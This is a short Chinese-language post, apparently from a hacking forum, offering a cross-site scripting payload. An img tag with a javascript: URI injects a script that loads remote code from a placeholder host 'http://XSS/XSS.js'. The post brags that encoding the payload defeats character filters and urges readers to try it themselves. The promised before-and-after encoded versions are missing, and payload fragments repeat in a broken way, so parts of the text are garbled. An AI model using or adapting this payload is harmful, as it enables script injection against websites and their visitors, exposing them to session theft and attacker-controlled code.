<imgsrc="javascript:try{vars=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>字符过滤怎么办?用Encode加密后就无敌了~未加密前:<imgsrc
;s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){})
字符过滤怎么办?用Encode加密后就无敌了~
未加密前:
加密后:
嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码
